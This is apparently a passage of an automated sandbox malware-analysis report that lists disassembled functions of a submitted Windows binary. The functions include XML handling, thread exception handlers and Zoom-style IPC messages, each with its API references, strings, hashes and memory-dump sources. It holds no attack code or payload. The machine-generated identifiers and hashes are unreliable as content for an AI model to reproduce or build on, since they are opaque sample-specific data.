                • String ID: A file with such a destination name already exists.$Invalid destination file name specified.$Meeting Information$Success.$Unspecified error - add file: %s, %s$meetinginfo.log
                • API String ID: 1546090958-3647361996
                • Opcode ID: 357c33ddf6b6557eb3d7eabf19bda68321e9ee6ba719e33307cce63ecad6f4e5
                • Instruction ID: 5afd531b74440507c9dc9db0bda859f1a3e3c8334198007cfe358167de55084b
                • Opcode Fuzzy Hash: 357c33ddf6b6557eb3d7eabf19bda68321e9ee6ba719e33307cce63ecad6f4e5
                • Instruction Fuzzy Hash: 8D816372D0011AABDB14EBA4DC91AFEB779BF54310F54042AF616A7382EF306E45E760
                Function 00C5ED41 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 229COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C5ED4B
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000003,0000000F,?,00000000,000000D4,00C5C383,?,?,?,?,?,?,?,00000020), ref: 00C5EDD8
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(00D34CD0,tmStartTime,eventType,entryId,00000000), ref: 00C5EE8C
                • ?Assign@?$CStringT@D@Cmm@@QAEXPBD@Z.RWSNDPQSKZ(00000000,00000000,indentation), ref: 00C5EFFD
                  • Part of subcall function 00C5F1A8: __EH_prolog3_GS.LIBCMT ref: 00C5F1B2
                  • Part of subcall function 00C5F1A8: ??0?$CStringT@D@Cmm@@QAE@PBD@Z.RWSNDPQSKZ(-00000004,00000000,0000008C,00C5EF3B,?,?,?,?,?,?,00D34CD0,tmStartTime,eventType,entryId,00000000), ref: 00C5F214
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$String$??0?$H_prolog3_$Assign@?$State@Unlock@
                • String ID: entryId$eventType$indentation$tmStartTime
                • API String ID: 1592417975-1790541018
                • Opcode ID: e4750dd217f9eaf418876d0731dc07811ca91be98c6b2baffd78402347adff00
                • Instruction ID: fdd0a5ff35d1e5b3e9a49a34e17ac9cf74afc078119371a8c8850e0a1c3e11a5
                • Opcode Fuzzy Hash: e4750dd217f9eaf418876d0731dc07811ca91be98c6b2baffd78402347adff00
                • Instruction Fuzzy Hash: 0A918D35D00258DBCF18EBA8C881BEDB7B5AF55300F24419AE81677282EF706F89DB55
                Function 00CB0240 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 118COMMON
                Download Yara Rule
                APIs
                • ?SkipWhiteSpace@XMLUtil@tinyxml2@@SAPBDPBDPAH@Z.RWSNDPQSKZ(?,?), ref: 00CB0255
                  • Part of subcall function 00CA4220: ?IsWhiteSpace@XMLUtil@tinyxml2@@SA_ND@Z.RWSNDPQSKZ(00000001,?,?,00CB2A18,?,?,?,?,00CB27FC), ref: 00CA422B
                  • Part of subcall function 00CA4220: ?IsWhiteSpace@XMLUtil@tinyxml2@@SA_ND@Z.RWSNDPQSKZ(00000001,?,?,?,00CB2A18,?,?,?,?,00CB27FC), ref: 00CA4249
                • ?StringEqual@XMLUtil@tinyxml2@@SA_NPBD0H@Z.RWSNDPQSKZ(00000000,00D3CE58,00000002), ref: 00CB0276
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Util@tinyxml2@@$Space@White$Equal@SkipString
                • String ID: <!--$<![CDATA[
                • API String ID: 1841086794-371368006
                • Opcode ID: 5a66a4379655da36efe2bb3c452d1da8ec2fa5b4a96928bd91de7f1eef16182b
                • Instruction ID: fd7d0ddccaf96df2740b3d5e843ac9461f84c1f92716d0031582375612c4f1c3
                • Opcode Fuzzy Hash: 5a66a4379655da36efe2bb3c452d1da8ec2fa5b4a96928bd91de7f1eef16182b
                • Instruction Fuzzy Hash: 2531AC71B40211AFCB04DB24D886FDA77E9AF96304F240065F809AB356E774EE49C7D1
                Function 00CB2D00 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 117COMMON
                Download Yara Rule
                APIs
                • ?Write@XMLPrinter@tinyxml2@@IAEXPBDI@Z.RWSNDPQSKZ(?,?), ref: 00CB2D6F
                • ?Write@XMLPrinter@tinyxml2@@IAEXPBDI@Z.RWSNDPQSKZ(?,?), ref: 00CB2DB2
                • ?Putc@XMLPrinter@tinyxml2@@IAEXD@Z.RWSNDPQSKZ(00000026), ref: 00CB2DDB
                • ?Write@XMLPrinter@tinyxml2@@IAEXPBDI@Z.RWSNDPQSKZ(?,?), ref: 00CB2DF2
                • ?Putc@XMLPrinter@tinyxml2@@IAEXD@Z.RWSNDPQSKZ(0000003B,?,?), ref: 00CB2DFB
                • ?Write@XMLPrinter@tinyxml2@@IAEXPBDI@Z.RWSNDPQSKZ(?,?), ref: 00CB2E23
                • ?Write@XMLPrinter@tinyxml2@@IAEXPBD@Z.RWSNDPQSKZ(?), ref: 00CB2E2B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Printer@tinyxml2@@$Write@$Putc@
                • String ID: &#x%02X;
                • API String ID: 1150459937-1586712390
                • Opcode ID: 6614a987cf66bd37f55b7e00cf8d6518566527c807982b8dc37b40b7cd676d59
                • Instruction ID: e354fee6d03415174b9c1d04de70caf7624b7a0797e52171747b872229a46912
                • Opcode Fuzzy Hash: 6614a987cf66bd37f55b7e00cf8d6518566527c807982b8dc37b40b7cd676d59
                • Instruction Fuzzy Hash: 3531AD71A001545FDB05DB7AC891AFFBBFADF85301F14816AE051AB391CB259D06D7A0
                Function 00CDED81 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 111threadCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00CDED88
                • GetCurrentThreadId.KERNEL32 ref: 00CDEDA4
                  • Part of subcall function 00CDCAC4: EnterCriticalSection.KERNEL32(00DFFB90,00000000,?), ref: 00CDCADF
                  • Part of subcall function 00CDCAC4: GetCurrentThreadId.KERNEL32 ref: 00CDCAE5
                  • Part of subcall function 00CDCAC4: LeaveCriticalSection.KERNEL32(00DFFB90,?,00000000,?,?), ref: 00CDCB3D
                • EnterCriticalSection.KERNEL32(?,dbghelp.dll,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 00CDEDC5
                • _set_unexpected.LIBVCRUNTIME ref: 00CDEE32
                • LeaveCriticalSection.KERNEL32(?,?,?,?,?), ref: 00CDEEBA
                Strings
                • Success., xrefs: 00CDEEA3, 00CDEEAF
                • Unspecified error - SetThreadExceptionHandlers: %x, %d., xrefs: 00CDEDB1
                • Can't install handlers for current thread twice., xrefs: 00CDEDF8
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: CriticalSection$CurrentEnterLeaveThread$H_prolog3_set_unexpected
                • String ID: Can't install handlers for current thread twice.$Success.$Unspecified error - SetThreadExceptionHandlers: %x, %d.
                • API String ID: 2198388211-1398901415
                • Opcode ID: 687050b4af121a4f19afa82a7f4856c6e52f8b7ff263c9e12ef840ff6a837c9d
                • Instruction ID: 9f068075c5cd78b6409543dd0a40615c20118a52e7195b494de8bccadb78d05e
                • Opcode Fuzzy Hash: 687050b4af121a4f19afa82a7f4856c6e52f8b7ff263c9e12ef840ff6a837c9d
                • Instruction Fuzzy Hash: 0F4154B5E00309ABDB14EFA9D485AEEB7B5EF48710F24401BF915EB381CB709941CBA5
                Function 00D0E3D5 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58libraryCOMMON
                Download Yara Rule
                APIs
                • DecodePointer.KERNEL32(?,?,?,00D0E71B,00DFF8D0,?,?,?,00CDC444,00000000), ref: 00D0E3E7
                • LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,?,?,00D0E71B,00DFF8D0,?,?,?,00CDC444,00000000), ref: 00D0E3FC
                • DecodePointer.KERNEL32(?), ref: 00D0E478
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: DecodePointer$LibraryLoad
                • String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
                • API String ID: 1423960858-1745123996
                • Opcode ID: bba7fe310d9345e0e3c4b871cd668a92f52a9f07cf5b9e316a6131b9b77657ff
                • Instruction ID: 22ac11f19da31dcf290ef7fd9984d2d88edf175fc5d77b591a23e7ab54a4f46c
                • Opcode Fuzzy Hash: bba7fe310d9345e0e3c4b871cd668a92f52a9f07cf5b9e316a6131b9b77657ff
                • Instruction Fuzzy Hash: F401C0706403147BDA016B20AE07BED3B56CF1278DF088861FC49A72D2EBA1D90DC2B9
                Function 00C6E2A0 Relevance: 14.0, APIs: 2, Strings: 6, Instructions: 31windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6E2A7
                • ??0?$CmmMessageTemplate_5@HV?$CStringT@_W@Cmm@@V12@V12@V12@@Archive@Cmm@@QAE@PBDH00000@Z.RWSNDPQSKZ(com.zoom.app.assistant.control.system.do.operation.request,00009D15,Type,DeviceID,MethodID,ParamID,Value,00000004), ref: 00C6E2D6
                  • Part of subcall function 00C7B9D0: __EH_prolog3.LIBCMT ref: 00C7B9D7
                  • Part of subcall function 00C7B9D0: ??0?$CmmMessageTemplate_4@HV?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(?,?,?,?,?,?,00000004,00C6E2DB,com.zoom.app.assistant.control.system.do.operation.request,00009D15,Type,DeviceID,MethodID,ParamID,Value,00000004), ref: 00C7B9F3
                  • Part of subcall function 00C8E502: __EH_prolog3_GS.LIBCMT ref: 00C8E509
                  • Part of subcall function 00C8E502: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000058,00C6E315,com.zoom.app.assistant.control.system.do.operation.request,Type,DeviceID,MethodID,ParamID,Value,com.zoom.app.assistant.control.system.do.operation.request,00009D15,Type,DeviceID,MethodID,ParamID,Value,00000004), ref: 00C8E541
                  • Part of subcall function 00C8E502: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000058,00C6E315,com.zoom.app.assistant.control.system.do.operation.request,Type,DeviceID,MethodID,ParamID,Value,com.zoom.app.assistant.control.system.do.operation.request,00009D15,Type,DeviceID,MethodID,ParamID), ref: 00C8E56F
                  • Part of subcall function 00C8E502: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000058,00C6E315,com.zoom.app.assistant.control.system.do.operation.request,Type,DeviceID,MethodID,ParamID,Value,com.zoom.app.assistant.control.system.do.operation.request,00009D15,Type,DeviceID,MethodID), ref: 00C8E5AC
                  • Part of subcall function 00C8E502: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000058,00C6E315,com.zoom.app.assistant.control.system.do.operation.request,Type,DeviceID,MethodID,ParamID,Value,com.zoom.app.assistant.control.system.do.operation.request,00009D15,Type), ref: 00C8E5DC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$ArchiveV12@$H_prolog3MessagePackageTree@V12@@$H00000@H0000@H_prolog3_Node@23@Root@Template_4@Template_5@Tree
                • String ID: DeviceID$MethodID$ParamID$Type$Value$com.zoom.app.assistant.control.system.do.operation.request
                • API String ID: 281469360-3067624559
                • Opcode ID: 02813e15bfbceb7b721285ee22cae1af182679594588ab4f47656029d9e4d299
                • Instruction ID: 598a0b3798f4d93317c0b85e4e81b32ea7a0eb2f2b68155e2d8a4082b4fae095
                • Opcode Fuzzy Hash: 02813e15bfbceb7b721285ee22cae1af182679594588ab4f47656029d9e4d299
                • Instruction Fuzzy Hash: CEF0A0B17807D6BFE7106B415C07F6A6264A740F5FF448429B2046A3DACBF08A08DBB4
                Function 00C6E970 Relevance: 14.0, APIs: 2, Strings: 6, Instructions: 31windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6E977
                • ??0?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@IHV12@I@Archive@Cmm@@QAE@PBDH00000@Z.RWSNDPQSKZ(com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,00009DD6,deviceID,deviceType,selectNotFoundDevice,channelName,signalType,00000004), ref: 00C6E9A6
                  • Part of subcall function 00C7B810: __EH_prolog3.LIBCMT ref: 00C7B817
                  • Part of subcall function 00C7B810: ??0?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@IHV12@@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(?,?,?,?,?,?,00000004,00C6E9AB,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,00009DD6,deviceID,deviceType,selectNotFoundDevice,channelName,signalType,00000004), ref: 00C7B833
                  • Part of subcall function 00C8EAC0: __EH_prolog3_GS.LIBCMT ref: 00C8EAC7
                  • Part of subcall function 00C8EAC0: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6E9D5,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,?,?,selectNotFoundDevice,?,?,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,00009DD6,deviceID,deviceType,selectNotFoundDevice,channelName,signalType,00000004), ref: 00C8EAE7
                  • Part of subcall function 00C8EAC0: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6E9D5,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,?,?,selectNotFoundDevice,?,?,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,00009DD6,deviceID,deviceType,selectNotFoundDevice,channelName), ref: 00C8EB15
                  • Part of subcall function 00C8EAC0: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000048,00C6E9D5,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,?,?,selectNotFoundDevice,?,?,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,00009DD6,deviceID,deviceType,selectNotFoundDevice), ref: 00C8EB52
                  • Part of subcall function 00C8EAC0: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000048,00C6E9D5,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,?,?,selectNotFoundDevice,?,?,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,00009DD6,deviceID), ref: 00C8EB82
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@$H00000@H0000@H_prolog3_Node@23@Root@Template_4@Template_5@TreeV12@V12@@
                • String ID: channelName$com.zoom.app.assistant.virtualaudio.message.set.selected.device.request$deviceID$deviceType$selectNotFoundDevice$signalType
                • API String ID: 859509072-2625786810
                • Opcode ID: 70444e82fef1459f982d0971b14fd9716941018156bae301d0c582c10dfd60d7
                • Instruction ID: 4a5a40d4b71afd4b9fdfe534855bec18a96b9c29c21b983632ee498576f3482f
                • Opcode Fuzzy Hash: 70444e82fef1459f982d0971b14fd9716941018156bae301d0c582c10dfd60d7
                • Instruction Fuzzy Hash: CFF0A0F0651398BFE7246B15CC4BF6B2598E745BA4F808A5CB1046A3C2DBF0A804D77C
                Function 00C6EA90 Relevance: 14.0, APIs: 2, Strings: 6, Instructions: 31windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6EA97
                • ??0?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@IHV12@I@Archive@Cmm@@QAE@PBDH00000@Z.RWSNDPQSKZ(com.zoom.app.assistant.virtualaudio.message.set.selected.device.response,00009DD7,deviceID,deviceType,result,channelName,signalType,00000004), ref: 00C6EAC6
                  • Part of subcall function 00C7B810: __EH_prolog3.LIBCMT ref: 00C7B817
                  • Part of subcall function 00C7B810: ??0?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@IHV12@@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(?,?,?,?,?,?,00000004,00C6E9AB,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,00009DD6,deviceID,deviceType,selectNotFoundDevice,channelName,signalType,00000004), ref: 00C7B833
                  • Part of subcall function 00C8EAC0: __EH_prolog3_GS.LIBCMT ref: 00C8EAC7
                  • Part of subcall function 00C8EAC0: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6E9D5,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,?,?,selectNotFoundDevice,?,?,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,00009DD6,deviceID,deviceType,selectNotFoundDevice,channelName,signalType,00000004), ref: 00C8EAE7
                  • Part of subcall function 00C8EAC0: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6E9D5,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,?,?,selectNotFoundDevice,?,?,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,00009DD6,deviceID,deviceType,selectNotFoundDevice,channelName), ref: 00C8EB15
                  • Part of subcall function 00C8EAC0: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000048,00C6E9D5,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,?,?,selectNotFoundDevice,?,?,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,00009DD6,deviceID,deviceType,selectNotFoundDevice), ref: 00C8EB52
                  • Part of subcall function 00C8EAC0: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000048,00C6E9D5,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,?,?,selectNotFoundDevice,?,?,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,00009DD6,deviceID), ref: 00C8EB82
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@$H00000@H0000@H_prolog3_Node@23@Root@Template_4@Template_5@TreeV12@V12@@
                • String ID: channelName$com.zoom.app.assistant.virtualaudio.message.set.selected.device.response$deviceID$deviceType$result$signalType
                • API String ID: 859509072-4167536049
                • Opcode ID: 8234dda542c10a6ba5730e7dafa505ab174813b14995c8380e5ccd44eea676d4
                • Instruction ID: 548eae501ec089207cb575cbb472e40f70a30e43b92c64c186f885db137432b9
                • Opcode Fuzzy Hash: 8234dda542c10a6ba5730e7dafa505ab174813b14995c8380e5ccd44eea676d4
                • Instruction Fuzzy Hash: 11F055F0A413807FE7146B05CC8BF2B25A8E740F91F50845C72045A3C2CAF04C04D279
                Function 00C72190 Relevance: 14.0, APIs: 2, Strings: 6, Instructions: 26windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C72197
                • ??0?$CmmMessageTemplate_5@HV?$CStringT@_W@Cmm@@V12@HH@Archive@Cmm@@QAE@PBDH00000@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.settingssynctopt.request,00009E8C,req_type,device_name,device_id,is_enable,level,00000004), ref: 00C721C5
                  • Part of subcall function 00C7A420: __EH_prolog3.LIBCMT ref: 00C7A427
                  • Part of subcall function 00C7A420: ??0?$CmmMessageTemplate_4@HV?$CStringT@_W@Cmm@@V12@H@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(?,?,?,?,?,?,00000004,00C721CA,com.zoom.app.cci.ccivideo.settingssynctopt.request,00009E8C,req_type,device_name,device_id,is_enable,level,00000004), ref: 00C7A443
                  • Part of subcall function 00C92963: __EH_prolog3_GS.LIBCMT ref: 00C9296A
                  • Part of subcall function 00C92963: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C721F2,com.zoom.app.cci.ccivideo.settingssynctopt.request), ref: 00C92984
                  • Part of subcall function 00C92963: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000044,00C721F2,com.zoom.app.cci.ccivideo.settingssynctopt.request), ref: 00C929B2
                  • Part of subcall function 00C92963: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(-00000004,-00000004,?), ref: 00C929EF
                  • Part of subcall function 00C92963: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,-00000004,-00000004,?), ref: 00C92A1F
                  • Part of subcall function 00C92963: EnterCriticalSection.KERNEL32(?), ref: 00C92AB1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
